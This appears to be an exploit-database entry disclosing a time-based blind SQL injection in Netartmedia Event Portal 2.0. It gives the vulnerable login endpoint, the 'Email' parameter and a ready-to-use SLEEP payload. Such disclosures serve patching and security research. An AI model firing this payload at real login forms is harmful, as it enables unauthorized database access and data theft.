![$site['logo_alt']](/img/neosense-logo.png){kind=logo}
NeoSense Netartmedia Event Portal 2.0 - 'Email' SQL Injection
Author: Ahmet Ümit BAYRAM type: webapps platform: php port: 80.0 date_added: 2019-03-19 date_updated: 2019-03-19 verified: 1 codes: tags: SQL Injection (SQLi) aliases: screenshot_url: application_url: raw file: 46560.txt
# Exploit Title: Netartmedia Event Portal 2.0 - 'Email' SQL Injection # Date: 19.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.netartmedia.net/eventportal/ # Demo Site: https://www.phpscriptdemos.com/events/ # Version: 2.0 # Tested on: Kali Linux # CVE: N/A # Description: Event Portal is a a web software (php script), that can be used to create advanced and multi-user event listing and ticket selling websites. ----- PoC: SQLi (time-based blind) ----- # POST Request: http://localhost/[PATH]/loginaction.php # Vulnerable Parameter: Email # Payload: '||(SELECT 0x59685353 FROM DUAL WHERE 7114=7114 AND SLEEP(5))||'